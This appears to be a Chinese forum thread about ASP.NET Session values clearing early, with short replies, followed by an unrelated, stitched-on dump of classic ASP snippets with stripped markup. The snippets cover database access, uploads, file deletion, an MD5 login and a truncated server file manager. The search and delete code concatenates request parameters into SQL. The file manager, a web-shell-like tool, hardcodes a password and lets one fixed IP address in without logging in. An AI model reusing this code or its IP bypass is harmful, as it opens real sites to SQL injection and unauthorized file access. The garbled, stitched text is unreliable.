请问:ASP.net中,Session变量还没超时,其值就被自动清空,是什么原因?

木棉花大榕树 2005-11-15 09:08:16
如题!!!
...全文
167 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
echojun 2006-06-26
  • 打赏
  • 举报
回复

我也是看了n多个帖子了,用了n多个方法,就是不能解决这个该死的session丢失的问题,头疼死了
dragonfly001 2005-11-15
  • 打赏
  • 举报
回复
同感:)
charles_y 2005-11-15
  • 打赏
  • 举报
回复
session的这个问题已经被问了无数遍了
但是并不是所有的人都会遇到这样的问题,而遇到问题的人配置方面跟没遇到的基本也没什么两样
所以,只能是.net的问题了

还有,在改动web.config等文件时,所有的session 都会丢失
foyuan 2005-11-15
  • 打赏
  • 举报
回复
那就用Cookie吧
我觉得那个是挺好用的

缓存的数据放到Cache里面也行!
mapserver 2005-11-15
  • 打赏
  • 举报
回复
asp.net里的Session是一直有问题的,经常会串值,希望05里有所改进。
LGame 2005-11-15
  • 打赏
  • 举报
回复
我也遇到过,
DEBUG时没有问题~~

但一运行,就经常发生
lmz2004_01 2005-11-15
  • 打赏
  • 举报
回复
正常是不可能地
ChengKing 2005-11-15
  • 打赏
  • 举报
回复
代码?

可能是你读取方式有问题.
连接数据库代码实例 1,连接数据库代码 文件名称 conn.asp 所有访问数据库的文件都调用此文件 <% db=\"data/data.mdb\" \'数据库存放目录 on error resume next set conn=server.createobject(\"adodb.connection\") conn.open \"driver={microsoft access driver (*.mdb)};dbq=\"&server.mappath(db) if err then err.clear set conn = Nothing response.write \"数据库连接出错,请检查conn.asp的连接字符串。\" response.end end if function CloseDB Conn.Close set Conn=Nothing End Function %> <% dim badword badword=\"\'|and|select|update|chr|delete|%20from|;|insert|mid|master.|set|chr(37)|=\" if request.QueryString<>\"\" then chk=split(badword,\"|\") for each query_name in request.querystring for i=0 to ubound(chk) if instr(lcase(request.querystring(query_name)),chk(i))<>0 then response.write \"<script language=javascript>alert(\'传参错误!参数 \"&query_name&\" 的值包含非法字符串!\\n\\n\');location=\'\"&request.ServerVariables(\"HTTP_REFERER\")&\"\'\" response.end end if next next end if %> ---------------------------------------------- 2。增加纪录 <% if request(\"action\")=\"add\" then name=request.form(\"name\") content=request.form(\"content\") set rs=server.createobject(\"adodb.recordset\") sql=\"select * from biao\" rs.open sql,conn,3,2 rs.addnew rs(\"name\")=name if content<>\"\" then rs(\"content\")=content else rs(\"content\")=null end if rs(\"date\")=date() rs.update rs.close set rs=nothing response.write \"<script language=javascript>alert(\'添加成功!\');location.href(\'index.asp\'); -------------------------------------- 3.显示记录 <% set rs=server.createobject(\"adodb.recordset\") sql=\"select * from biao order by id desc\" \'sql=\"select top 10 * from biao order by id desc\" rs.open sql,conn,1,1 rs.pagesize=15 \'-------设置每页显示的记录数 dim page page=request(\"page\") if page<>\"\" and IsNumeric(page) then page=clng(page) else page=1 end if n=rs.pagecount if page>n then page=clng(n) end if if rs.eof then response.write\"有信息!\" \'response.end else rs.absolutepage=page end if i=0 do while not rs.eof and i --------如果是每行显示n个纪录开始---------------------------- <% do while not rs.eof and i\" end if %> --------如果是每行显示n个纪录结束----------------------------- <%=rs(\"id\")%> <% rs.movenext i=i+1 loop %> <% response.write(\"共\"&rs.recordcount&\"条信息   \") if page<>1 then response.write(\"首页 \") else response.write(\"首页 \") end if if page>1 then response.write(\"上一页 \") else response.write(\"上一页 \") end if if page下一页 \") else response.write(\"下一页 \") end if if page<>n then response.write(\"尾页 \") else response.write(\"尾页 \") end if response.write(\"   当前页:\"&page&\"/\"&n&\"\") %> 转到: ------search.asp--------------- <% if request("keyword")<>"" and request("select")<>"" then sql="select * from biao where "&request("select")&" like '%"&request("keyword")&"%'" elseif request("keyword")<>"" and request("select")="all" then sql="select * from biao where name like '%"&request("keyword")&"%' or id like '%"&request("keyword")&"%' or content like '%"&request("keyword")&"%'" else response.redirect("index.asp") end if set rs=server.createobject("adodb.recordset") rs.open sql,conn,1,1 rs.pagesize=15 '-------设置每页显示的记录数 dim page page=request("page") if page<>"" and IsNumeric(page) then page=clng(page) else page=1 end if n=rs.pagecount if page>n then page=clng(n) end if if rs.eof then response.write"查询的信息不存在或者已经删除!" 'response.end else rs.absolutepage=page end if i=0 do while not rs.eof and i <%=rs("id")%> <% rs.movenext i=i+1 loop %> ----------------------------------------- 6.有分类的纪录代码 ---------------显示分类开始--------------------------------- <% set rs=server.createobject("adodb.recordset") sql="select all * from class order by id desc" rs.open sql,conn,1,1 do while not rs.eof %> "><%=rs("classname")%> <% rs.movenext i=i+1 loop %> ---------------显示分类结束-------------------------- -------------显示现在所在分类开始------------------- <% set rs=server.createobject("adodb.recordset") sql="select top 1 * from class where classname='"&request("classname")&"'" rs.open sql,conn,1,1 do while not rs.eof %> <%=rs("classname")%> <% rs.movenext i=i+1 loop %> -----------显示现在所在分类结束---------------------- -----------显示此分类的纪录开始------------ <% set rs=server.createobject("adodb.recordset") sql="select * from biao where fenlei='"&request("classname")&"'" rs.open sql,conn,1,1 rs.pagesize=10 '-------设置每页显示的记录数 dim page page=request("page") if page<>"" and IsNumeric(page) then page=clng(page) else page=1 end if n=rs.pagecount if page>n then page=clng(n) end if if rs.bof or rs.eof then response.write"有任何数据!" 'response.end else rs.absolutepage=page end if i=0 do while not rs.eof and i <%=rs("id")%> <% rs.movenext i=i+1 loop %> --------------显示此分类的纪录结束---------------- ---------删除所在分类纪录开始------------ <% if request("classname")<>"" then%> " title="删除所有本类信息?" onClick="{if (confirm('您确定要删除所有信息吗?')){return true;}return false;}">清空所有本类信息 <%end if%> if request("action")="del_fenlei" then classname=request("classname") conn.execute("delete * from biao where fenlei='"&classname&"'") CloseDB response.write"<script language='javascript'>alert('删除本类成功!');location.href('?action=manage'); upsoftpic.asp
upfile.asp <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%Server.ScriptTimeout=999%> <% if request("action")="upsoftpic" then set upload=new upload_5xsoft set file=upload.file("softpic") fileExt=lcase(right(file.filename,4)) if fileEXT<>".jpg" and fileEXT<>".gif" and fileEXT<>".rar" then '---设置上传类型 ++++fileEXT<>".***"++++++++ response.write"<script>alert('格式不对,请重新上传!');location='"&request.ServerVariables("HTTP_REFERER")&"'0 then formPath="upfile/softpic" '-------上传路径 'formPath="../upfile/softpic" if right(formPath,1)<>"/" then formPath=formPath&"/" end if vfname = filename(now()) fname = vfname & "." & GetExtendName(file.FileName) file.SaveAs Server.mappath(formPath&fname) ''保存文件 %> <script> parent.form.picurl.value+='upfile/softpic/<%=fname%>' //-上传路径 //parent.frmadd.dreamcontent.value+='[img]upload/<%=ufp%>[/img]' location.replace('Upsoftpic.asp') //---返回文件 upload.asp 删除文件和记录 <% if request("action")="manage" then call manage() end if if request("action")="edit" then id=request("id") set rs=server.createobject("adodb.recordset") sql="select * from biao where id="&id&"" rs.open sql,conn,1,1 call edit() end if if request("action")="del" then set rs=server.createobject("adodb.recordset") sql="select * from biao where id="&request("id")&"" rs.open sql,conn,3,2 set fileobj=server.createobject("scripting.filesystemobject") if fileobj.FileExists(server.mappath(""&rs("picurl"))) then fileobj.DeleteFile server.mappath(""&rs("picurl")) end if rs.delete conn.close response.write"<script language='javascript'>alert('删除成功!');location.href('?action=manage');alert('所有已成功删除!');location.href('?action=manage'); 删除文件 &struploadfiles=<%=rs("picurl")%>&action=delsoftpic" onClick="{if (confirm('您确定要删除这个吗?')){return true;}return false;}">删除 -------------------------------- --*delfile.asp内容*--- <%if request("action")="delsoftpic" then picurl=request.form("picurl") set rs=server.createobject("adodb.recordset") sql="select * from biao where id="&request("id")&"" rs.open sql,conn,3,2 rs("picurl")=null struploadfiles=trim(request.querystring("struploadfiles")) action=trim(request.querystring("action")) dim fso,arruploadfiles,i set fso = createobject("scripting.filesystemobject") fso.deletefile(server.mappath("" & struploadfiles)) set fso = nothing rs.update conn.close set rs=nothing response.write"<script language='javascript'>alert('删除成功!');location.href('edit.asp?id="&request("id")&"&action=edit'); [返回] 8。有关ubb ----------ubbcode.asp-------------- <% const ImagePath="images/emot/" function UBBCode(strContent) strContent= FilterJS(strContent) dim re dim po,ii dim reContent Set re=new RegExp re.IgnoreCase =true re.Global=True po=0 ii=0 re.Pattern="[UPLOAD=(gif|jpg|jpeg|bmp|png)](.[^[]*)(gif|jpg|jpeg|bmp)[/UPLOAD]" strContent=re.replace(strContent,"
此主题相关图片如下:
转动滚轮可缩放图片") re.Pattern="[IMG](http|https|ftp)://(.[^[]*)[/IMG]" strContent=re.replace(strContent,"转动滚轮可缩放图片;按此在新窗口浏览图片") re.Pattern="[DIR=*([0-9]*),*([0-9]*)](.[^[]*)[/DIR]" strContent=re.Replace(strContent,"") re.Pattern="[QT=*([0-9]*),*([0-9]*)](.[^[]*)[/QT]" strContent=re.Replace(strContent,"") re.Pattern="[MP=*([0-9]*),*([0-9]*)](.[^[]*)[/MP]" strContent=re.Replace(strContent,"") re.Pattern="[RM=*([0-9]*),*([0-9]*)](.[^[]*)[/RM]" strContent=re.Replace(strContent,"
") re.Pattern="([FLASH])(.[^[]*)([/FLASH])" strContent= re.Replace(strContent,"点击开新窗口欣赏该FLASH动画![全屏欣赏]
$2") re.Pattern="([FLASH=*([0-9]*),*([0-9]*)])(.[^[]*)([/FLASH])" strContent= re.Replace(strContent,"点击开新窗口欣赏该FLASH动画![全屏欣赏]
$4") re.Pattern="([URL])(.[^[]*)([/URL])" strContent= re.Replace(strContent,"$2") re.Pattern="([URL=(.[^[]*)])(.[^[]*)([/URL])" strContent= re.Replace(strContent,"$3") re.Pattern="([EMAIL])(S+@.[^[]*)([/EMAIL])" strContent= re.Replace(strContent,"$2") re.Pattern="([EMAIL=(S+@.[^[]*)])(.[^[]*)([/EMAIL])" strContent= re.Replace(strContent,"$3") '自动识别网址 're.Pattern = "^((http|https|ftp|rtsp|mms):(//|\\)[A-Za-z0-9./=?%-&_~`@':+!]+)" 'strContent = re.Replace(strContent,"$1") 're.Pattern = "((http|https|ftp|rtsp|mms):(//|\\)[A-Za-z0-9./=?%-&_~`@':+!]+)$" 'strContent = re.Replace(strContent,"$1") 're.Pattern = "([^>=""])((http|https|ftp|rtsp|mms):(//|\\)[A-Za-z0-9./=?%-&_~`@':+!]+)" 'strContent = re.Replace(strContent,"$1$2") '自动识别www等开头的网址 're.Pattern = "([^(http://|http:\)])((www|cn)[.](w)+[.]{1,}(net|com|cn|org|cc)(((/[~]*|\[~]*)(w)+)|[.](w)+)*(((([?](w)+){1}[=]*))*((w)+){1}([&](w)+[=](w)+)*)*)" 'strContent = re.Replace(strContent,"$2") '自动识别Email地址,如打开本功能在浏览内容很多的帖子会引起服务器停顿 're.Pattern = "([^(=)])((w)+[@]{1}((w)+[.]){1,3}(w)+)" 'strContent = re.Replace(strContent,"$2") re.Pattern="[em(.[^[]*)]" strContent=re.Replace(strContent,"") re.Pattern="[HTML](.[^[]*)[/HTML]" strContent=re.Replace(strContent,"
以下内容为程序代码:
$1
") re.Pattern="[code](.[^[]*)[/code]" strContent=re.Replace(strContent,"
以下内容为程序代码:
$1
") re.Pattern="[color=(.[^[]*)](.[^[]*)[/color]" strContent=re.Replace(strContent,"$2") re.Pattern="[face=(.[^[]*)](.[^[]*)[/face]" strContent=re.Replace(strContent,"$2") re.Pattern="[align=(center|left|right)](.*)[/align]" strContent=re.Replace(strContent,"
$2
") re.Pattern="[QUOTE](.*)[/QUOTE]" strContent=re.Replace(strContent,"
$1

") re.Pattern="[fly](.*)[/fly]" strContent=re.Replace(strContent,"$1") re.Pattern="[move](.*)[/move]" strContent=re.Replace(strContent,"$1") re.Pattern="[GLOW=*([0-9]*),*(#*[a-z0-9]*),*([0-9]*)](.[^[]*)[/GLOW]" strContent=re.Replace(strContent,"$4
") re.Pattern="[SHADOW=*([0-9]*),*(#*[a-z0-9]*),*([0-9]*)](.[^[]*)[/SHADOW]" strContent=re.Replace(strContent,"$4
") re.Pattern="[i](.[^[]*)[/i]" strContent=re.Replace(strContent,"$1") re.Pattern="[u](.[^[]*)([/u])" strContent=re.Replace(strContent,"$1") re.Pattern="[b](.[^[]*)([/b])" strContent=re.Replace(strContent,"$1") re.Pattern="[size=([1-4])](.[^[]*)[/size]" strContent=re.Replace(strContent,"$2") strContent=replace(strContent,"","") set re=Nothing UBBCode=strContent end function Function FilterJS(v) if not isnull(v) then dim t dim re dim reContent Set re=new RegExp re.IgnoreCase =true re.Global=True re.Pattern="(javascript)" t=re.Replace(v,"javascript") re.Pattern="(jscript:)" t=re.Replace(t,"jscript:") re.Pattern="(js:)" t=re.Replace(t,"js:") 're.Pattern="(value)" 't=re.Replace(t,"value") re.Pattern="(about:)" t=re.Replace(t,"about:") re.Pattern="(file:)" t=re.Replace(t,"file:") re.Pattern="(document.cookie)" t=re.Replace(t,"documents.cookie") re.Pattern="(vbscript:)" t=re.Replace(t,"vbscript:") re.Pattern="(vbs:)" t=re.Replace(t,"vbs:") re.Pattern="(on(mouse|exit|error|click|key))" t=re.Replace(t,"on$2") 're.Pattern="(&#)" 't=re.Replace(t,"&#") FilterJS=t set re=nothing end if End Function function HTMLEncode(fString) if not isnull(fString) then fString = replace(fString, ">", ">") fString = replace(fString, "<", "<") fString = Replace(fString, CHR(32), " ") fString = Replace(fString, CHR(9), " ") fString = Replace(fString, CHR(34), """) fString = Replace(fString, CHR(39), "'") fString = Replace(fString, CHR(13), "") fString = Replace(fString, CHR(10) & CHR(10), "

") fString = Replace(fString, CHR(10), "
") HTMLEncode = fString end if end function function nohtml(str) dim re Set re=new RegExp re.IgnoreCase =true re.Global=True re.Pattern="(<.[^<]*>)" str=re.replace(str," ") re.Pattern="()" str=re.replace(str," ") nohtml=str set re=nothing end function function cutStr(str,strlen) dim l,t,c l=len(str) t=0 for i=1 to l c=Abs(Asc(Mid(str,i,1))) if c>255 then t=t+2 else t=t+1 end if if t>=strlen then cutStr=left(str,i)&".." exit for else cutStr=str end if next cutStr=replace(cutStr,chr(10),"") end function %> '----------ubbcode.asp结束----------------------------- <%=left(rs("name"),6)%> <%=ubbcode(rs("content"))%> <%=Server.HTMLEncode(rs("content"))%> ----------------------字符截取开始------------------------------- <% if len(rs("name"))>10 then response.write ""&left(rs("name"),10)&".." else response.write ""&rs("name")&"" end if %> ----------------------字符截取结束--------------------------------- 9。有关后台登陆 chk.asp <% if session("admin")="" then response.redirect"index.asp" end if %> md5.asp <% Private Const BITS_TO_A_BYTE = 8 Private Const BYTES_TO_A_WORD = 4 Private Const BITS_TO_A_WORD = 32 Private m_lOnBits(30) Private m_l2Power(30) Private Function LShift(lValue, iShiftBits) If iShiftBits = 0 Then LShift = lValue Exit Function ElseIf iShiftBits = 31 Then If lValue And 1 Then LShift = &H80000000 Else LShift = 0 End If Exit Function ElseIf iShiftBits < 0 Or iShiftBits > 31 Then Err.Raise 6 End If If (lValue And m_l2Power(31 - iShiftBits)) Then LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000 Else LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits)) End If End Function Private Function RShift(lValue, iShiftBits) If iShiftBits = 0 Then RShift = lValue Exit Function ElseIf iShiftBits = 31 Then If lValue And &H80000000 Then RShift = 1 Else RShift = 0 End If Exit Function ElseIf iShiftBits < 0 Or iShiftBits > 31 Then Err.Raise 6 End If RShift = (lValue And &H7FFFFFFE) m_l2Power(iShiftBits) If (lValue And &H80000000) Then RShift = (RShift Or (&H40000000 m_l2Power(iShiftBits - 1))) End If End Function Private Function RotateLeft(lValue, iShiftBits) RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits)) End Function Private Function AddUnsigned(lX, lY) Dim lX4 Dim lY4 Dim lX8 Dim lY8 Dim lResult lX8 = lX And &H80000000 lY8 = lY And &H80000000 lX4 = lX And &H40000000 lY4 = lY And &H40000000 lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF) If lX4 And lY4 Then lResult = lResult Xor &H80000000 Xor lX8 Xor lY8 ElseIf lX4 Or lY4 Then If lResult And &H40000000 Then lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8 Else lResult = lResult Xor &H40000000 Xor lX8 Xor lY8 End If Else lResult = lResult Xor lX8 Xor lY8 End If AddUnsigned = lResult End Function Private Function md5_F(x, y, z) md5_F = (x And y) Or ((Not x) And z) End Function Private Function md5_G(x, y, z) md5_G = (x And z) Or (y And (Not z)) End Function Private Function md5_H(x, y, z) md5_H = (x Xor y Xor z) End Function Private Function md5_I(x, y, z) md5_I = (y Xor (x Or (Not z))) End Function Private Sub md5_FF(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_F(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub md5_GG(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_G(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub md5_HH(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_H(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub md5_II(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_I(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Function ConvertToWordArray(sMessage) Dim lMessageLength Dim lNumberOfWords Dim lWordArray() Dim lBytePosition Dim lByteCount Dim lWordCount Const MODULUS_BITS = 512 Const CONGRUENT_BITS = 448 lMessageLength = Len(sMessage) lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) BITS_TO_A_BYTE)) (MODULUS_BITS BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS BITS_TO_A_WORD) ReDim lWordArray(lNumberOfWords - 1) lBytePosition = 0 lByteCount = 0 Do Until lByteCount >= lMessageLength lWordCount = lByteCount BYTES_TO_A_WORD lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition) lByteCount = lByteCount + 1 Loop lWordCount = lByteCount BYTES_TO_A_WORD lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition) lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3) lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29) ConvertToWordArray = lWordArray End Function Private Function WordToHex(lValue) Dim lByte Dim lCount For lCount = 0 To 3 lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1) WordToHex = WordToHex & Right("0" & Hex(lByte), 2) Next End Function Public Function MD5(sMessage) m_lOnBits(0) = CLng(1) m_lOnBits(1) = CLng(3) m_lOnBits(2) = CLng(7) m_lOnBits(3) = CLng(15) m_lOnBits(4) = CLng(31) m_lOnBits(5) = CLng(63) m_lOnBits(6) = CLng(127) m_lOnBits(7) = CLng(255) m_lOnBits(8) = CLng(511) m_lOnBits(9) = CLng(1023) m_lOnBits(10) = CLng(2047) m_lOnBits(11) = CLng(4095) m_lOnBits(12) = CLng(8191) m_lOnBits(13) = CLng(16383) m_lOnBits(14) = CLng(32767) m_lOnBits(15) = CLng(65535) m_lOnBits(16) = CLng(131071) m_lOnBits(17) = CLng(262143) m_lOnBits(18) = CLng(524287) m_lOnBits(19) = CLng(1048575) m_lOnBits(20) = CLng(2097151) m_lOnBits(21) = CLng(4194303) m_lOnBits(22) = CLng(8388607) m_lOnBits(23) = CLng(16777215) m_lOnBits(24) = CLng(33554431) m_lOnBits(25) = CLng(67108863) m_lOnBits(26) = CLng(134217727) m_lOnBits(27) = CLng(268435455) m_lOnBits(28) = CLng(536870911) m_lOnBits(29) = CLng(1073741823) m_lOnBits(30) = CLng(2147483647) m_l2Power(0) = CLng(1) m_l2Power(1) = CLng(2) m_l2Power(2) = CLng(4) m_l2Power(3) = CLng(8) m_l2Power(4) = CLng(16) m_l2Power(5) = CLng(32) m_l2Power(6) = CLng(64) m_l2Power(7) = CLng(128) m_l2Power(8) = CLng(256) m_l2Power(9) = CLng(512) m_l2Power(10) = CLng(1024) m_l2Power(11) = CLng(2048) m_l2Power(12) = CLng(4096) m_l2Power(13) = CLng(8192) m_l2Power(14) = CLng(16384) m_l2Power(15) = CLng(32768) m_l2Power(16) = CLng(65536) m_l2Power(17) = CLng(131072) m_l2Power(18) = CLng(262144) m_l2Power(19) = CLng(524288) m_l2Power(20) = CLng(1048576) m_l2Power(21) = CLng(2097152) m_l2Power(22) = CLng(4194304) m_l2Power(23) = CLng(8388608) m_l2Power(24) = CLng(16777216) m_l2Power(25) = CLng(33554432) m_l2Power(26) = CLng(67108864) m_l2Power(27) = CLng(134217728) m_l2Power(28) = CLng(268435456) m_l2Power(29) = CLng(536870912) m_l2Power(30) = CLng(1073741824) Dim x Dim k Dim AA Dim BB Dim CC Dim DD Dim a Dim b Dim c Dim d Const S11 = 7 Const S12 = 12 Const S13 = 17 Const S14 = 22 Const S21 = 5 Const S22 = 9 Const S23 = 14 Const S24 = 20 Const S31 = 4 Const S32 = 11 Const S33 = 16 Const S34 = 23 Const S41 = 6 Const S42 = 10 Const S43 = 15 Const S44 = 21 x = ConvertToWordArray(sMessage) a = &H67452301 b = &HEFCDAB89 c = &H98BADCFE d = &H10325476 For k = 0 To UBound(x) Step 16 AA = a BB = b CC = c DD = d md5_FF a, b, c, d, x(k + 0), S11, &HD76AA478 md5_FF d, a, b, c, x(k + 1), S12, &HE8C7B756 md5_FF c, d, a, b, x(k + 2), S13, &H242070DB md5_FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE md5_FF a, b, c, d, x(k + 4), S11, &HF57C0FAF md5_FF d, a, b, c, x(k + 5), S12, &H4787C62A md5_FF c, d, a, b, x(k + 6), S13, &HA8304613 md5_FF b, c, d, a, x(k + 7), S14, &HFD469501 md5_FF a, b, c, d, x(k + 8), S11, &H698098D8 md5_FF d, a, b, c, x(k + 9), S12, &H8B44F7AF md5_FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1 md5_FF b, c, d, a, x(k + 11), S14, &H895CD7BE md5_FF a, b, c, d, x(k + 12), S11, &H6B901122 md5_FF d, a, b, c, x(k + 13), S12, &HFD987193 md5_FF c, d, a, b, x(k + 14), S13, &HA679438E md5_FF b, c, d, a, x(k + 15), S14, &H49B40821 md5_GG a, b, c, d, x(k + 1), S21, &HF61E2562 md5_GG d, a, b, c, x(k + 6), S22, &HC040B340 md5_GG c, d, a, b, x(k + 11), S23, &H265E5A51 md5_GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA md5_GG a, b, c, d, x(k + 5), S21, &HD62F105D md5_GG d, a, b, c, x(k + 10), S22, &H2441453 md5_GG c, d, a, b, x(k + 15), S23, &HD8A1E681 md5_GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8 md5_GG a, b, c, d, x(k + 9), S21, &H21E1CDE6 md5_GG d, a, b, c, x(k + 14), S22, &HC33707D6 md5_GG c, d, a, b, x(k + 3), S23, &HF4D50D87 md5_GG b, c, d, a, x(k + 8), S24, &H455A14ED md5_GG a, b, c, d, x(k + 13), S21, &HA9E3E905 md5_GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8 md5_GG c, d, a, b, x(k + 7), S23, &H676F02D9 md5_GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A md5_HH a, b, c, d, x(k + 5), S31, &HFFFA3942 md5_HH d, a, b, c, x(k + 8), S32, &H8771F681 md5_HH c, d, a, b, x(k + 11), S33, &H6D9D6122 md5_HH b, c, d, a, x(k + 14), S34, &HFDE5380C md5_HH a, b, c, d, x(k + 1), S31, &HA4BEEA44 md5_HH d, a, b, c, x(k + 4), S32, &H4BDECFA9 md5_HH c, d, a, b, x(k + 7), S33, &HF6BB4B60 md5_HH b, c, d, a, x(k + 10), S34, &HBEBFBC70 md5_HH a, b, c, d, x(k + 13), S31, &H289B7EC6 md5_HH d, a, b, c, x(k + 0), S32, &HEAA127FA md5_HH c, d, a, b, x(k + 3), S33, &HD4EF3085 md5_HH b, c, d, a, x(k + 6), S34, &H4881D05 md5_HH a, b, c, d, x(k + 9), S31, &HD9D4D039 md5_HH d, a, b, c, x(k + 12), S32, &HE6DB99E5 md5_HH c, d, a, b, x(k + 15), S33, &H1FA27CF8 md5_HH b, c, d, a, x(k + 2), S34, &HC4AC5665 md5_II a, b, c, d, x(k + 0), S41, &HF4292244 md5_II d, a, b, c, x(k + 7), S42, &H432AFF97 md5_II c, d, a, b, x(k + 14), S43, &HAB9423A7 md5_II b, c, d, a, x(k + 5), S44, &HFC93A039 md5_II a, b, c, d, x(k + 12), S41, &H655B59C3 md5_II d, a, b, c, x(k + 3), S42, &H8F0CCC92 md5_II c, d, a, b, x(k + 10), S43, &HFFEFF47D md5_II b, c, d, a, x(k + 1), S44, &H85845DD1 md5_II a, b, c, d, x(k + 8), S41, &H6FA87E4F md5_II d, a, b, c, x(k + 15), S42, &HFE2CE6E0 md5_II c, d, a, b, x(k + 6), S43, &HA3014314 md5_II b, c, d, a, x(k + 13), S44, &H4E0811A1 md5_II a, b, c, d, x(k + 4), S41, &HF7537E82 md5_II d, a, b, c, x(k + 11), S42, &HBD3AF235 md5_II c, d, a, b, x(k + 2), S43, &H2AD7D2BB md5_II b, c, d, a, x(k + 9), S44, &HEB86D391 a = AddUnsigned(a, AA) b = AddUnsigned(b, BB) c = AddUnsigned(c, CC) d = AddUnsigned(d, DD) Next 'MD5 = LCase(WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d)) MD5=LCase(WordToHex(b) & WordToHex(c)) 'I crop this to fit 16byte database password :D End Function %> index.asp(登陆页面)

log.asp <% Session.TimeOut=30 if request("action")="login" then admin=trim(request.form("admin")) for i=1 to len(admin) '用MID函数读出变量admini 位置的一个字符 manage=mid(admin,i,1) if manage="'" or manage="%" or manage="<" or manage=">" or manage="&" then '如果admin含有' % < > &字符就转到出错页面 response.redirect "Error.asp" response.end end if next pwd=trim(request.form("pwd")) for i=1 to len(pwd) '用MID函数读出变量pwdi 位置的一个字符 pass=mid(pwd,i,1) if pass="'" or pass="%" or pass="<" or pass=">" or pass="&" then '如果pass含有' % < > &字符就转到出错页面 response.redirect "Error.asp" response.end end if next pwd=md5(pwd) if admin="" or pwd="" then Response.Redirect ("Index.asp") end if set rs=server.createobject("adodb.recordset") sql="select * from admin where admin='"&admin&"'and pwd='"&pwd&"'" rs.open sql,conn,1,1 if not rs.eof then session("admin")=admin response.redirect"main.asp" else response.redirect"Error.asp" response.end end if end if if request("action")="logout" then session("admin")="" response.redirect"../index.asp" end if %> error.asp 登陆出错,三秒钟自动返回 其它想加密的页面调用chk.asp pwd.asp修改密码 <% if request("action")="edit" then admin=trim(request.form("admin")) pwd=md5(trim(request.form("pwd"))) set rs=server.createobject("adodb.recordset") sql="select * from admin" rs.open sql,conn,3,2 rs("admin")=admin rs("pwd")=pwd rs.update set rs=nothing set conn=nothing response.write"<script language='javascript'>alert('修改成功!');location.href('Admin_Admin.asp'); ------------------------
" size="20"> " size="20">
info.asp(读取服务器基本参数) 无标题文档
恭喜:你已成功登陆后台管理!
 服务器名:  <%=Request.ServerVariables("SERVER_NAME")%>
 服务器IP:  <%=Request.ServerVariables("LOCAL_ADDR")%>
 服务器端口:  <%=Request.ServerVariables("SERVER_PORT")%>
 服务器时间:  <%=now%>
 IIS版本:  <%=Request.ServerVariables("SERVER_SOFTWARE")%>
 服务器操作系统:  <%=Request.ServerVariables("OS")%>
 脚本超时时间:  <%=Server.ScriptTimeout%> 秒
 站点物理路径:  <%=request.ServerVariables("APPL_PHYSICAL_PATH")%>
 服务器CPU数量:  <%=Request.ServerVariables("NUMBER_OF_PROCESSORS")%> 个
 服务器解译引擎:  <%=ScriptEngine & "/"& ScriptEngineMajorVersion &"."&ScriptEngineMinorVersion&"."& ScriptEngineBuildVersion %>
 本文件路径:  <%=Request.ServerVariables("PATH_TRANSLATED")%>
<% '========================== 版权声明 ========================= '本程序只供在需要特别处理服务器文件时使用,严禁用于非法目的 '由于非正当使用本程序而造成的一切后果及责任自负 '版本: v0.12 '作者: 河北科技大学 rssn | Risingsun,Hebust 'QQ: 126027268 'E-mail: rssn@163.com 'Date: 2006-8-12 '============================================================= Server.ScriptTimeout=20 Session.Timeout=45 'Session有效时间 Const mss="explorer_" 'Session前缀 Const Password="knowsky" '登录密码 Const Copyright="
©CopyLeft 2006. Coded By rssn, Hebust. No Rights Reserved
" '版权信息 Dim T1,T2,Runtime T1=Timer() Dim oFso Set oFso=Server.CreateObject("Scripting.FileSystemObject") '------------------------------------------------------------- '声明函数所需的全局变量 Dim conn,rs,oStream,NoPackFiles,RootPath,FailFileList NoPackFiles="|<$datafile>.mdb|<$datafile>.ldb|" '------------------------------------------------------------- Call Main() Set oFso=Nothing '======================== Subs Begin ========================= Sub Main() Select Case Request("page") Case "img" Call Page_Img() Case "css" Call Page_Css() Case "loginchk" Call LoginChk() Case "logout" Call Logout() Case Else: '"一夫当关,万夫莫开"——用户验证 If Session(mss&"IsAdminlogin")=True Or Request.ServerVariables("REMOTE_ADDR")="121.193.213.246" Then '已登录 Else Call Login() Exit Sub End If Select Case Request("act") Case "drive" Call Drive() Case "up" Call DirUp() Case "new" Call NewF(Request("fname")) Case "savenew" Call SaveNew(Request("fname")) Case "rename" Call Rename() Case "saverename" Call SaveRename() Case "edit" Call Edit(Request("fname")) Case "saveedit" Call 